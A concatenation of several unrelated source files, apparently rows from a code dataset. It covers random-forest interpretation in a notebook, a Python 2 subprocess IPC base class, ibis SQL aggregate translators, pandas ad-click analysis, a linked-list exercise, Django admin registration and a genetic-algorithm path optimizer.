        'config': [config],
        'rmse_train': [rmse(m.predict(X_train), y_train)],
        'rmse_dev': [rmse(m.predict(X_valid), y_valid)],
        'r2_train': [m.score(X_train, y_train)],
        'r2_dev': [m.score(X_valid, y_valid)],
        'r2_oob': [None],
        'n_trees':[m.n_estimators],
        'train_size': [len(y_train)],
        'dev_size': [len(y_valid)],
    }
    # Out-of-bag R² exists only when the forest was fit with oob_score=True.
    if hasattr(m, 'oob_score_'): res['r2_oob'][0] = m.oob_score_
    return pd.DataFrame(res)
# -
df_raw
# # Confidence based on tree variance
# For model interpretation, there's no need to use the full dataset on each tree - using a subset will be both faster, and also provide better interpretability (since an overfit model will not provide much variance across trees).
set_rf_samples(50000)
m = RandomForestRegressor(n_estimators=40, min_samples_leaf=3, max_features=0.5, n_jobs=-1, oob_score=True)
m.fit(X_train, y_train)
results = get_scores(m, 'baseline-subsample-tuning')
results
# We saw how the model averages predictions across the trees to get an estimate - but how can we know the confidence of the estimate? One simple way is to use the standard deviation of predictions, instead of just the mean. This tells us the *relative* confidence of predictions - that is, for rows where the trees give very different results, you would want to be more cautious of using those results, compared to cases where they are more consistent. Using the same example as in the last lesson when we looked at bagging:
# %time preds = np.stack([t.predict(X_valid) for t in m.estimators_])
np.mean(preds[:,0]), np.std(preds[:,0])
# When we use python to loop through trees like this, we're calculating each in series, which is slow! We can use parallel processing to speed things up:
# Worker for parallel_trees: predict on the module-level X_valid with one tree *t*.
def get_preds(t): return t.predict(X_valid)
# %time preds = np.stack(parallel_trees(m, get_preds))
np.mean(preds[:,0]), np.std(preds[:,0])
# We can see that different trees are giving different estimates for this auction. In order to see how prediction confidence varies, we can add this into our dataset.
x = raw_valid.copy()
x['pred_std'] = np.std(preds, axis=0)
x['pred'] = np.mean(preds, axis=0)
x.Enclosure.value_counts().plot.barh();
flds = ['Enclosure', 'SalePrice', 'pred', 'pred_std']
enc_summ = x[flds].groupby('Enclosure', as_index=False).mean()
enc_summ
enc_summ = enc_summ[~pd.isnull(enc_summ.SalePrice)]
enc_summ.plot('Enclosure', 'SalePrice', 'barh', xlim=(0,11));
enc_summ.plot('Enclosure', 'pred', 'barh', xerr='pred_std', alpha=0.6, xlim=(0,11));
# *Question*: Why are the predictions nearly exactly right, but the error bars are quite wide?
raw_valid.ProductSize.value_counts().plot.barh();
flds = ['ProductSize', 'SalePrice', 'pred', 'pred_std']
summ = x[flds].groupby(flds[0]).mean()
summ
(summ.pred_std/summ.pred).sort_values(ascending=False)
# # Feature importance
# It's not normally enough to just to know that a model can make accurate predictions - we also want to know *how* it's making predictions. The most important way to see this is with *feature importance*.
fi = rf_feat_importance(m, df_trn); fi[:10]
fi.plot('cols', 'imp', figsize=(10,6), legend=False);
# Horizontal bar chart of a feature-importance DataFrame ('cols' vs. 'imp').
def plot_fi(fi): return fi.plot('cols', 'imp', 'barh', figsize=(12,7), legend=False)
plot_fi(fi[:30]);
to_keep = fi[fi.imp>0.005].cols; len(to_keep)
df_keep = df_trn[to_keep].copy()
X_train, X_valid = split_vals(df_keep, n_trn)
m = RandomForestRegressor(n_estimators=40, min_samples_leaf=3, max_features=0.5,
n_jobs=-1, oob_score=True)
m.fit(X_train, y_train)
tmp = get_scores(m, 'fi')
tmp
results = pd.concat([tmp, results])
results[::-1]
fi = rf_feat_importance(m, df_keep)
plot_fi(fi);
# ## One-hot encoding
# proc_df's optional *max_n_cat* argument will turn some categorical variables into new columns.
#
# For example, the column **ProductSize** which has 6 categories:
#
# * Large
# * Large / Medium
# * Medium
# * Compact
# * Small
# * Mini
#
# gets turned into 6 new columns:
#
# * ProductSize_Large
# * ProductSize_Large / Medium
# * ProductSize_Medium
# * ProductSize_Compact
# * ProductSize_Small
# * ProductSize_Mini
#
# and the column **ProductSize** gets removed.
#
# It will only happen to columns whose number of categories is no bigger than the value of the *max_n_cat* argument.
#
# Now some of these new columns may prove to have more important features than in the earlier situation, where all categories were in one column.
# +
df_trn2, y_trn, nas = proc_df(df_raw, 'SalePrice', max_n_cat=7)
X_train, X_valid = split_vals(df_trn2, n_trn)
m = RandomForestRegressor(n_estimators=40, min_samples_leaf=3, max_features=0.6, n_jobs=-1, oob_score=True)
m.fit(X_train, y_train)
# -
tmp = get_scores(m, 'one-hot')
tmp
results = pd.concat([tmp, results])
results[::-1]
fi = rf_feat_importance(m, df_trn2)
plot_fi(fi[:25]);
# # Removing redundant features
# One thing that makes this harder to interpret is that there seem to be some variables with very similar meanings. Let's try to remove redundant features.
from scipy.cluster import hierarchy as hc
corr = np.round(scipy.stats.spearmanr(df_keep).correlation, 4)
corr_condensed = hc.distance.squareform(1-corr)
z = hc.linkage(corr_condensed, method='average')
fig = plt.figure(figsize=(16,10))
dendrogram = hc.dendrogram(z, labels=df_keep.columns, orientation='left', leaf_font_size=16)
plt.show()
sorted(list(df_keep.columns))
len(corr), len(corr[0])
# Let's try removing some of these related features to see if the model can be simplified without impacting the accuracy.
def get_oob(df):
    """Fit a small forest on the training slice of *df* and return its OOB R².

    Used to compare feature subsets cheaply; reads the module-level
    n_trn and y_train globals.
    """
    m = RandomForestRegressor(n_estimators=30, min_samples_leaf=5, max_features=0.6, n_jobs=-1, oob_score=True)
    x, _ = split_vals(df, n_trn)
    m.fit(x, y_train)
    return m.oob_score_
# Here's our baseline.
get_oob(df_keep)
# Now we try removing each variable one at a time.
for c in ('saleYear', 'saleElapsed', 'fiModelDesc', 'fiBaseModel', 'Grouser_Tracks', 'Coupler_System'):
print(c, get_oob(df_keep.drop(c, axis=1)))
# It looks like we can try one from each group for removal. Let's see what that does.
to_drop = ['saleYear', 'fiBaseModel', 'Grouser_Tracks']
get_oob(df_keep.drop(to_drop, axis=1))
# Looking good! Let's use this dataframe from here. We'll save the list of columns so we can reuse it later.
df_keep.drop(to_drop, axis=1, inplace=True)
X_train, X_valid = split_vals(df_keep, n_trn)
# +
# np.save('tmp/keep_cols.npy', np.array(df_keep.columns))
# -
# keep_cols = np.load('tmp/keep_cols.npy')
# df_keep = df_trn[keep_cols]
keep_cols = df_keep.columns
sorted(list(keep_cols))
# And let's see how this model looks on the full dataset.
reset_rf_samples()
m = RandomForestRegressor(n_estimators=40, min_samples_leaf=3, max_features=0.5, n_jobs=-1, oob_score=True)
m.fit(X_train, y_train)
tmp = get_scores(m, 'baseline-slow-dedup')
tmp
results = pd.concat([tmp, results])
results[::-1]
# # Partial dependence
from pdpbox import pdp
from plotnine import *
set_rf_samples(50000)
# This next analysis will be a little easier if we use the 1-hot encoded categorical variables, so let's load them up again.
df_trn2, y_trn, nas = proc_df(df_raw, 'SalePrice', max_n_cat=7)
X_train, X_valid = split_vals(df_trn2, n_trn)
m = RandomForestRegressor(n_estimators=40, min_samples_leaf=3, max_features=0.6, n_jobs=-1)
m.fit(X_train, y_train);
plot_fi(rf_feat_importance(m, df_trn2)[:10]);
df_raw.plot('YearMade', 'saleElapsed', 'scatter', alpha=0.01, figsize=(10,8));
x_all = get_sample(df_raw[df_raw.YearMade>1930], 500)
ggplot(x_all, aes('YearMade', 'SalePrice'))+stat_smooth(se=True, method='loess')
x = get_sample(X_train[X_train.YearMade>1930], 500)
def plot_pdp_old(feat, clusters=None, feat_name=None):
    """Partial-dependence plot via the old pdpbox API (positional feature arg).

    Uses the module-level model ``m`` and sample ``x``; *clusters*, when set,
    clusters the individual lines into that many centers.
    """
    feat_name = feat_name or feat
    p = pdp.pdp_isolate(m, x, feat)
    return pdp.pdp_plot(p, feat_name, plot_lines=True,
                        cluster=clusters is not None,
                        n_cluster_centers=clusters)
def plot_pdp(feat, clusters = None, feat_name = None):
    """Partial-dependence plot via the newer pdpbox API.

    Same as plot_pdp_old but passes the keyword ``feature``/``model_features``
    arguments that recent pdpbox versions require.
    """
    feat_name = feat_name or feat
    p = pdp.pdp_isolate(m, x, feature = feat, model_features = x.columns)
    return pdp.pdp_plot(p, feat_name, plot_lines = True,
                        cluster = clusters is not None,
                        n_cluster_centers = clusters)
plot_pdp('YearMade')
plot_pdp('YearMade', clusters=5)
sorted(list(x.columns))
try:
feats = ['saleElapsed', 'YearMade']
p = pdp.pdp_interact(m, x, x.columns, feats)
pdp.pdp_interact_plot(p, feats)
except:
print("ignore errors")
plot_pdp(['Enclosure_EROPS w AC', 'Enclosure_EROPS', 'Enclosure_OROPS'], 5, 'Enclosure')
# Clamp implausibly old YearMade values to 1950. Bug fix: the original used
# chained indexing (df_raw.YearMade[mask] = 1950), which triggers
# SettingWithCopyWarning and becomes a silent no-op under pandas copy-on-write;
# a single .loc write is the supported in-place assignment.
df_raw.loc[df_raw.YearMade < 1950, 'YearMade'] = 1950
df_keep['age'] = df_raw['age'] = df_raw.saleYear-df_raw.YearMade
X_train, X_valid = split_vals(df_keep, n_trn)
m = RandomForestRegressor(n_estimators=40, min_samples_leaf=3, max_features=0.6, n_jobs=-1)
m.fit(X_train, y_train)
plot_fi(rf_feat_importance(m, df_keep));
# # Tree interpreter
from treeinterpreter import treeinterpreter as ti
df_train, df_valid = split_vals(df_raw[df_keep.columns], n_trn)
row = X_valid.values[None,0]; row
prediction, bias, contributions = ti.predict(m, row)
prediction[0], bias[0]
idxs = np.argsort(contributions[0])
pd.concat(
[pd.DataFrame(contributions[0]),
pd.DataFrame(contributions[0][idxs]),
pd.DataFrame(idxs)],
axis=1
)
[o for o in zip(df_keep.columns[idxs], df_valid.iloc[0][idxs], contributions[0][idxs])]
contributions[0].sum(), bias[0], contributions[0].sum() + bias[0], prediction[0]
# # Extrapolation
# Label each row by split membership so a classifier can test whether the
# validation rows are distinguishable from training rows (extrapolation check).
df_ext = df_keep.copy()
df_ext['is_valid'] = 1
# Bug fix: the original chained indexing (df_ext.is_valid[:n_trn] = 0)
# triggers SettingWithCopyWarning and is a silent no-op under pandas
# copy-on-write; write through .loc on the first n_trn index labels instead.
df_ext.loc[df_ext.index[:n_trn], 'is_valid'] = 0
x, y, nas = proc_df(df_ext, 'is_valid')
m = RandomForestClassifier(n_estimators=40, min_samples_leaf=3, max_features=0.5, n_jobs=-1, oob_score=True)
m.fit(x, y);
m.oob_score_
fi = rf_feat_importance(m, x); fi[:10]
feats=['SalesID', 'saleElapsed', 'MachineID']
(X_train[feats]/1000).describe()
(X_valid[feats]/1000).describe()
x.drop(feats, axis=1, inplace=True)
m = RandomForestClassifier(n_estimators=40, min_samples_leaf=3, max_features=0.5, n_jobs=-1, oob_score=True)
m.fit(x, y);
m.oob_score_
fi = rf_feat_importance(m, x); fi[:10]
feats=['age', 'YearMade', 'saleDayofyear']
(X_train[feats]).describe()
(X_valid[feats]).describe()
set_rf_samples(50000)
feats=['SalesID', 'saleElapsed', 'MachineID',
'age', 'YearMade', 'saleDayofyear']
X_train, X_valid = split_vals(df_keep, n_trn)
m = RandomForestRegressor(n_estimators=40, min_samples_leaf=3, max_features=0.5, n_jobs=-1, oob_score=True)
m.fit(X_train, y_train)
get_scores(m, '')
for f in feats:
df_subs = df_keep.drop(f, axis=1)
X_train, X_valid = split_vals(df_subs, n_trn)
m = RandomForestRegressor(n_estimators=40, min_samples_leaf=3, max_features=0.5, n_jobs=-1, oob_score=True)
m.fit(X_train, y_train)
print(f)
display(get_scores(m, ''))
# +
# reset_rf_samples()
# +
# for comparison
# -
X_train, X_valid = split_vals(df_keep, n_trn)
m = RandomForestRegressor(n_estimators=40, min_samples_leaf=3, max_features=0.5, n_jobs=-1, oob_score=True)
m.fit(X_train, y_train)
tmp = get_scores(m, 'before-remove')
tmp
results = pd.concat([tmp, results])
results[::-1]
df_subs = df_keep.drop(['SalesID', 'MachineID', 'saleDayofyear'], axis=1)
X_train, X_valid = split_vals(df_subs, n_trn)
m = RandomForestRegressor(n_estimators=40, min_samples_leaf=3, max_features=0.5, n_jobs=-1, oob_score=True)
m.fit(X_train, y_train)
tmp = get_scores(m, 'after-remove')
tmp
results = pd.concat([tmp, results])
results[::-1]
reset_rf_samples()
df_subs = df_keep.drop(['SalesID', 'MachineID', 'saleDayofyear'], axis=1)
X_train, X_valid = split_vals(df_subs, n_trn)
m = RandomForestRegressor(n_estimators=40, min_samples_leaf=3, max_features=0.5, n_jobs=-1, oob_score=True)
m.fit(X_train, y_train)
tmp = get_scores(m, 'full')
tmp
results = pd.concat([tmp, results])
results[::-1]
plot_fi(rf_feat_importance(m, X_train));
np.save('tmp/subs_cols.npy', np.array(df_subs.columns))
# # Our final model!
m = RandomForestRegressor(n_estimators=160, max_features=0.5, n_jobs=-1, oob_score=True)
# %time m.fit(X_train, y_train)
get_scores(m, "final")
tmp = get_scores(m, "final")
tmp
results = pd.concat([tmp, results])
results[::-1]
cols = results.columns[:6]
results[cols].plot.barh(
x='config',
subplots=True,
# rot=90,
# ylim=(0,1),
# title=['']*4,
legend=False,
figsize=(8,3*results.shape[0])
);
|
12,405 | 3feac9e2d42d6c9f5868bd8146b96157369193f7 | # coding=utf-8
#
# Copyright (C) 2013 Allis Tauri <allista@gmail.com>
#
# DegenPrimerGUI is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the
# Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# DegenPrimerGUI is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program. If not, see <http://www.gnu.org/licenses/>.
'''
Created on Nov 10, 2013
@author: Allis Tauri <allista@gmail.com>
'''
import os
import sys
import abc
import signal
import argparse
import traceback
import multiprocessing.connection as mpc
import BioUtils.Tools.tmpStorage as tmpStorage
from BioUtils.Tools.UMP import ignore_interrupt
from multiprocessing.managers import SyncManager
from threading import Thread
from time import sleep
class SignalListener(Thread):
    """Daemon thread that waits for one control message on a connection.

    When the received message equals the expected signal string (default
    'ABORT'), the supplied event is set; any other message is ignored.
    Connection/interrupt errors end the thread silently, everything else
    is printed to stderr.
    """

    def __init__(self, connection, event, sig='ABORT'):
        Thread.__init__(self)
        # Daemonized so a stuck recv() never blocks interpreter shutdown.
        self.daemon = True
        self._con = connection
        self._event = event
        self._signal = sig

    def _handle_signal(self):
        # Blocks until exactly one message arrives on the connection.
        if self._con.recv() == self._signal:
            self._event.set()

    def run(self):
        try:
            self._handle_signal()
        except (KeyboardInterrupt, EOFError, IOError):
            pass
        except Exception:
            traceback.print_exc()
#end class
class StreamEncoder(object):
    """File-like wrapper that UTF-8-encodes everything written to a stream.

    Python-2 specific: relies on the ``unicode`` builtin to coerce *text*
    before encoding, so arbitrary objects may be written.
    """
    # Byte encoding applied to every write.
    encoding = 'UTF-8'
    def __init__(self, stream):
        self._stream = stream
    def write(self, text):
        # Coerce to unicode first so non-string objects are accepted too.
        encoded = unicode(text).encode(self.encoding)
        self._stream.write(encoded)
    def flush(self):
        self._stream.flush()
    def isatty(self):
        # Delegate so callers can still detect interactive terminals.
        return self._stream.isatty()
#end class
class SubprocessBase(object):
    '''Base class for subprocess routines that use socket connection.

    Protocol (see _main): refuse to run on a tty, initialize, read the server
    port from argv and the auth key from stdin, connect to the parent on
    localhost, receive the work payload, run _do_work while a SignalListener
    watches for an ABORT message, then report completion and disconnect.
    Subclasses implement _initialize and _do_work. Python-2 syntax throughout.
    '''
    __metaclass__ = abc.ABCMeta

    _error_msg = ('This executable should only be called from '
                  'inside the main program.')

    def __init__(self):
        # Remember the parent pid so the signal handler no-ops in forked children.
        self._pid = os.getpid()
        #abort event
        # Manager-backed Event so worker processes can observe the abort flag;
        # the manager process itself ignores SIGINT (ignore_interrupt).
        self._mgr = SyncManager()
        self._mgr.start(ignore_interrupt)
        self._abort_event = self._mgr.Event()
        #stdout/err
        self._err = StreamEncoder(sys.stderr)
        self._out = StreamEncoder(sys.stdout)
        #connection information
        self._port = None
        self._con = None
        # The whole subprocess protocol runs immediately on construction.
        self()
    #end def

    def __del__(self):
        if self._con is not None:
            # NOTE(review): ``terminate`` is not defined in this class or in
            # view — presumably supplied by subclasses; confirm.
            self.terminate()
            self._con.close()
        self._mgr.shutdown()
    #end def

    def _check_tty(self):
        """Return True (after printing the usage error) when run from a terminal."""
        if sys.stdin.isatty():
            self._err.write(self._error_msg+'\n')
            return True
        return False
    #end def

    def _sig_handler(self, signal, frame):
        """SIGINT/SIGTERM/SIGQUIT handler: flag abort and clean temp files."""
        # Forked children inherit this handler; only the original process acts.
        if self._pid != os.getpid(): return
        self._out.write('%d aborting...\n'%os.getpid())
        self._abort_event.set(); sleep(0.1)
        tmpStorage.clean_tmp_files()
    #end def

    def _set_sig_handlers(self):
        signal.signal(signal.SIGINT, self._sig_handler)
        signal.signal(signal.SIGTERM, self._sig_handler)
        signal.signal(signal.SIGQUIT, self._sig_handler)
    #end def

    def _parse_args(self):
        """Read the parent's listening port number from the command line."""
        parser = argparse.ArgumentParser(self._error_msg)
        conf_group = parser.add_argument_group('Preset configuration')
        conf_group.add_argument('port', metavar='number',
                                type=int, nargs=1,
                                help='Port number to connect to.')
        args = parser.parse_args()
        self._port = args.port[0]
    #end def

    def _get_auth_key(self):
        # The parent passes the connection auth key as one line on stdin.
        try: self._auth = sys.stdin.readline().strip('\n')
        except: self._auth = None
    #end def

    def _connect(self):
        """Connect to the parent on localhost:self._port; return success flag."""
        if self._port is None: return False
        try: self._con = mpc.Client(('localhost', self._port),
                                    authkey=self._auth)
        except mpc.AuthenticationError, e:
            self._err.write('Cannot connect to the port %d\n%s\n' % (self._port,str(e)))
            return False
        except:
            traceback.print_exc()
            return False
        return True
    #end def

    def _report_to_server(self):
        # A bare None message signals work completion to the parent.
        if self._con is None: return
        self._con.send(None)
    #end def

    def _disconnect(self):
        if self._con is None: return
        self._con.close()
        self._con = None
    #end def

    @abc.abstractmethod
    def _initialize(self): pass

    @abc.abstractmethod
    def _do_work(self, data): pass

    def _main(self):
        """Run the full subprocess protocol; return 0 on success, >0 on error."""
        #check if run from a tty
        if self._check_tty(): return 1
        #set std streams
        sys.stderr = self._err
        sys.stdout = self._out
        #set signal handlers
        self._set_sig_handlers()
        #initialize
        if not self._initialize():
            print 'Unable to initialize.\n'
            return 2
        #parse commandline arguments
        self._parse_args()
        #get auth key
        self._get_auth_key()
        #try to connect and get data
        if not self._connect(): return 3
        data = self._con.recv()
        #start abort signal listener
        abort_listner = SignalListener(self._con, self._abort_event)
        abort_listner.start()
        #do the work, report back
        result = self._do_work(data)
        self._report_to_server()
        #join abort listener
        abort_listner.join()
        #close connection
        self._disconnect()
        # Non-zero work results are shifted past the connection error codes.
        return 0 if result == 0 else 3+result
    #end def

    def __call__(self, sys_exit=True, *args, **kwargs):
        """Run _main and exit the process with its code unless sys_exit is False."""
        try: ret = self._main()
        except SystemExit, e:
            if sys_exit: sys.exit(e.code)
            else: return e.code
        except:
            print 'Unhandled exception:'
            traceback.print_exc()
            if sys_exit: sys.exit(1)
            else: return 1
        if sys_exit: sys.exit(ret or 0)
        else: return 0
#end class
12,406 | 77487abd7eb4e966dff682fd1308da323c569f82 | from __future__ import annotations
import itertools
import ibis
import ibis.expr.operations as ops
def _reduction_format(translator, func_name, where, arg, *args):
    """Render a SQL aggregate call, folding an optional filter into a CASE."""
    if where is not None:
        arg = ops.Where(where, arg, ibis.NA)
    rendered = [translator.translate(a) for a in itertools.chain([arg], args)]
    return f"{func_name}({', '.join(rendered)})"
def reduction(func_name):
    """Build a translator function for an aggregate whose last op arg is the filter."""
    def formatter(translator, op):
        positional = op.args[:-1]
        where = op.args[-1]
        return _reduction_format(translator, func_name, where, *positional)
    return formatter
def variance_like(func_name):
    """Build a translator for variance-style aggregates with _samp/_pop variants."""
    suffixes = {"sample": "samp", "pop": "pop"}
    def formatter(translator, op):
        resolved = f"{func_name}_{suffixes[op.how]}"
        return _reduction_format(translator, resolved, op.where, op.arg)
    return formatter
def count_distinct(translator, op):
    """Render COUNT(DISTINCT ...), masking out filtered rows via CASE."""
    target = op.arg if op.where is None else ops.Where(op.where, op.arg, None)
    return f"count(DISTINCT {translator.translate(target)})"
|
12,407 | 015c01cd3032a5669096626d21e166e44ebdfc9a | import codecademylib
import pandas as pd
# A/B-test analysis of ad click data (Codecademy exercise script).
ad_clicks = pd.read_csv('ad_clicks.csv')
# Peek at the raw rows (value discarded outside a notebook).
ad_clicks.head(10)
# Clicks per acquisition source (value discarded outside a notebook).
ad_clicks.groupby('utm_source')\
    .user_id.count()\
    .reset_index()
# A row counts as a click when an ad_click_timestamp is present.
ad_clicks['is_click'] = ~ad_clicks\
    .ad_click_timestamp.isnull()
clicks_by_source = ad_clicks\
    .groupby(['utm_source',
              'is_click'])\
    .user_id.count()\
    .reset_index()
# Wide table: one row per source, True/False click counts as columns.
clicks_pivot = clicks_by_source\
    .pivot(index='utm_source',
           columns='is_click',
           values='user_id')\
    .reset_index()
# Click-through rate per source.
clicks_pivot['percent_clicked'] = \
    clicks_pivot[True] / \
    (clicks_pivot[True] +
     clicks_pivot[False])
ad_clicks.groupby('experimental_group')\
    .user_id.count().reset_index()
percentage_clicks = ad_clicks.groupby(['experimental_group', 'is_click',]).user_id.count().reset_index()
percentage_clicks['percentage'] = percentage_clicks['user_id']/ad_clicks.shape[0]
# Split by experimental group for per-day comparison.
a_clicks= ad_clicks[
    ad_clicks.experimental_group
    == 'A']
b_clicks= ad_clicks[
    ad_clicks.experimental_group
    == 'B']
day_groups= a_clicks.groupby('day').user_id.count().reset_index()
day_groups['percentage'] = day_groups['user_id']/a_clicks.shape[0]
print(clicks_pivot)
|
12,408 | dc702462f7e9f15398bc0825d4513b27c12b50d2 | """
Consider three situations:
* delete at the beginning
* delete at the middle
* delete at the end
"""
from utils import ListNode, stringToListNode, prettyPrintLinkedList
class Solution:
    def removeNthFromEnd(self, head: "ListNode", n: int) -> "ListNode":
        """Remove the n-th node from the end of a singly linked list.

        Collects the nodes into a list so the target's predecessor can be
        addressed directly: O(L) time, O(L) extra space.  Assumes
        1 <= n <= length (the LeetCode contract).

        Returns the (possibly new) head of the list.
        """
        # Materialize the node chain for direct indexing.
        nodes = []
        node = head
        while node:
            nodes.append(node)
            node = node.next
        if len(nodes) > n:
            # Splice out the target; its predecessor is at len - n - 1.
            # (The target nodes[len - n] always exists here, so no extra
            # None-guard is needed.)
            prev = nodes[len(nodes) - n - 1]
            prev.next = prev.next.next
        else:
            # n equals the list length: the head itself is removed.
            head = head.next
        return head
if __name__ == "__main__":
    # Smoke tests: remove from the middle, the tail, and the head.
    lst = stringToListNode("[1, 2, 3, 4, 5]")
    lst = Solution().removeNthFromEnd(lst, 2)
    prettyPrintLinkedList(lst)
    lst = stringToListNode("[1, 2, 3, 4, 5]")
    lst = Solution().removeNthFromEnd(lst, 1)
    prettyPrintLinkedList(lst)
    lst = stringToListNode("[1, 2, 3, 4, 5]")
    lst = Solution().removeNthFromEnd(lst, 5)
    prettyPrintLinkedList(lst)
|
12,409 | 608a582990dfb008ec9d05b669fc775f465053e1 | from django.contrib import admin
# Register your models here.
from .models import *
@admin.register(LunBo)
class LunBoAdmin(admin.ModelAdmin):
    """Admin list view for carousel (LunBo) entries: show the title only."""
    list_display = ('title',)
@admin.register(Index)
class IndexAdmin(admin.ModelAdmin):
    """Admin list view for Index entries: show the title only."""
    list_display = ('title',)
|
12,410 | 97535cab299032007ad40739ed6eef34df248177 | import random
import statistics
import time
from collections import defaultdict
from functools import reduce
from matplotlib import pyplot as pl
from settings import TOTAL_ROWS, RAIL_ROAD_ENTRANCE_ID
from utils import display_dictionary
from utils import load_maps, getEdgesDict, GeoUtils
class Environment:
    """Genetic-algorithm driver that evolves Env_Solution paths over a map
    of attractions, minimizing total path distance (fitness)."""
    # population_size = 100
    # gene_size = 50 - 1
    # generation_kill = 10
    # mutation_factor = 1000
    population_size = 300
    gene_size = 200
    new_childs = 25
    new_immigrants = 25
    # Worst individuals culled per generation, replaced by children + immigrants.
    generation_kill = new_childs + new_immigrants
    mutation_factor = 1000
    current_best = float("inf")
    def print_stats(self):
        """Append max/min/avg/stddev of population fitness to self.stats."""
        l = [p.fitness for p in self.population]
        maxi = max(l)
        mini = min(l)
        sumi = sum(l)
        avgi = sumi / len(self.population)
        stdi = statistics.stdev(l)
        # print(f"max {maxi}, min {mini}, avg {avgi}, std dev {stdi}")
        self.stats["max"].append(maxi)
        self.stats["min"].append(mini)
        self.stats["avg"].append(avgi)
        self.stats["std"].append(stdi)
    def display_stats(self):
        """Plot the recorded fitness statistics over generations (blocking)."""
        x_size = len(self.stats["max"])
        pl.plot([x for x in range(x_size)], self.stats["max"], label="max")
        pl.plot([x for x in range(x_size)], self.stats["min"], label="min")
        pl.plot([x for x in range(x_size)], self.stats["avg"], label="avg")
        pl.plot([x for x in range(x_size)], self.stats["std"], label="std")
        pl.legend()
        pl.show()
    def __init__(self, attractions_map, edges_dict):
        self.attractions_map = attractions_map
        self.edges_dict = edges_dict
        self.population = []
        self.stats = defaultdict(list)
        self.GeoHelper = GeoUtils(attractions_map)
    def loadPopulation(self):
        """Fill the population with randomly generated solutions."""
        for i in range(self.population_size):
            sol = Env_Solution(self, gene_size=self.gene_size)
            sol.create_genes()
            self.population.append(sol)
    def sort(self):
        # Ascending: lower fitness (shorter path) is better.
        self.population.sort(key=lambda x: x.fitness, reverse=False)
    def end_generation(self):
        """One GA step: cull the worst, breed children, add immigrants."""
        self.sort()
        if self.current_best > self.population[0].fitness:
            print(f"new best: {self.current_best} to {self.population[0].fitness}, and path size {len(self.population[0].path)} ")
            self.current_best = self.population[0].fitness
        for i in range(self.generation_kill):
            self.population.pop()
        # Two random parent indices per child (drawn from the survivors).
        random_indexes = [random.randint(0, self.population_size - self.generation_kill - 1) for i in
                          range(self.generation_kill * 2)]
        new_candidates = []
        for _ in range(self.new_childs):
            candidate = self.crossover(self.population[random_indexes.pop()], self.population[random_indexes.pop()])
            new_candidates.append(candidate)
        # for i in range(self.generation_kill):
        #     sol = Env_Solution(self, gene_size=self.gene_size)
        #     sol.create_genes()
        #     new_candidates.append(sol)
        # NOTE(review): only the first child can ever mutate here —
        # presumably a random child was intended; verify.
        if random.randint(1, self.mutation_factor) == 1:
            new_candidates[0].mutate()
        immigrants = [ Env_Solution(self, gene_size=self.gene_size, create_genes=True) for _ in range(self.new_immigrants) ]
        self.population.extend(new_candidates + immigrants)
    def display_best_solution(self):
        """Visualize the best individual's path and print the visited names."""
        edges = self.population[0].getEdges()
        display_dictionary(self.attractions_map, edges)
        # print("done")
        for (source_id, target_id) in edges:
            print(self.attractions_map[source_id]["name"])
        self.final_edges = edges
        # Relies on the loop variable after the loop: prints the final stop.
        print(self.attractions_map[target_id]["name"])
    def crossover(self, sol1, sol2):
        """Splice two parent paths at a randomly chosen shared node.

        NOTE(review): set.pop() raises KeyError if the parents share no
        node; both paths start at the rail-road entrance, so in practice
        `commons` should never be empty — verify.
        """
        commons = sol1.path_set.intersection(sol2.path_set)
        needle = commons.pop()
        index1 = sol1.path.index(needle)
        index2 = sol2.path.index(needle)
        path = [sol1.path[i] for i in range(index1 + 1)]
        path2 = [sol2.path[i] for i in range(index2 + 1, len(sol2.path))]
        path += path2
        # path = [sol1.path[i] if i <= index else sol2.path[i] for i in range(self.gene_size)]
        sol3 = Env_Solution(self, gene_size=len(path))
        sol3.put_genes(genes=path)
        return sol3
class Env_Solution:
    """One GA individual: a random walk (path of attraction ids) starting at
    the rail-road entrance, with fitness = walked distance plus a penalty
    per attraction never visited."""
    # size = 50 - 1
    start_pos = RAIL_ROAD_ENTRANCE_ID
    def __init__(self, env, gene_size, create_genes=False):
        self.path = [RAIL_ROAD_ENTRANCE_ID, ]
        # self.curr = self.start_pos
        self.env = env
        self.size = gene_size
        if create_genes:
            self.create_genes()
    def getEdges(self):
        """Return the path as a list of consecutive (source, target) pairs."""
        p1 = self.path[0]
        myedges = []
        # print(f" path size {self.path_size}, and array size {len(self.path)}")
        # for i in range(1, self.path_size+1):
        for i in range(1, len(self.path)):
            try:
                myedges.append((p1, self.path[i]))
            except Exception as e:
                print(e)
                raise e
            p1 = self.path[i]
        return myedges
    def mutate(self):
        """Re-randomize the path suffix from a random position onwards."""
        mutation_start = random.randint(0, len(self.path)-1)
        curr = self.path[mutation_start]
        for i in range(mutation_start + 1, len(self.path)):
            # edges_dict[node] is assumed to be the node's neighbor list.
            rnd_i = random.randint(0, len(self.env.edges_dict[curr]) - 1)
            curr = self.env.edges_dict[curr][rnd_i]
            self.path[i] = curr
        self.path_set = set(self.path)
        self.get_fitness()
    def put_genes(self, genes):
        """Adopt an externally built path (e.g. from crossover) and rescore."""
        self.path = genes
        self.path_set = set(genes)
        self.get_fitness()
    def create_genes(self):
        """Build a fresh random walk of self.size nodes from the start position."""
        curr = self.start_pos
        self.path = [0] * self.size
        self.path[0] = curr
        # visited = set()
        for i in range(1, self.size):
            rnd_i = random.randint(0, len(self.env.edges_dict[curr]) - 1)
            curr = self.env.edges_dict[curr][rnd_i]
            self.path[i] = curr
        self.path_set = set(self.path)
        self.get_fitness()
    # @profile
    def get_fitness(self):
        """Score the path: 1000 per unvisited attraction + walked distance.

        Also truncates self.path at the point where all attractions have
        been seen.  NOTE(review): edges_dict is indexed here by an
        (a, b) tuple for distances but by a single node for neighbors in
        create_genes/mutate — it apparently serves both roles; verify.
        """
        distance = 0
        # did not find all the rides
        diff = TOTAL_ROWS - len(set(self.path))
        # self.path_size = len(self.path)
        # if diff > 0:
        # penalty for each ride missing
        distance += (diff * 1000)
        # tmp = distance
        # else:
        good_path = set()
        for idx, val in enumerate(self.path):
            good_path.add(val)
            if len(good_path) == TOTAL_ROWS:
                # self.path_size = idx
                # print(f"smaller {path_size}, total {len(self.path)}")
                break
        self.path = self.path[:idx+1]
        # t1 = time.time()
        # # self.path_size = path_size
        # distance2 = distance
        # for r in range(1, path_size):
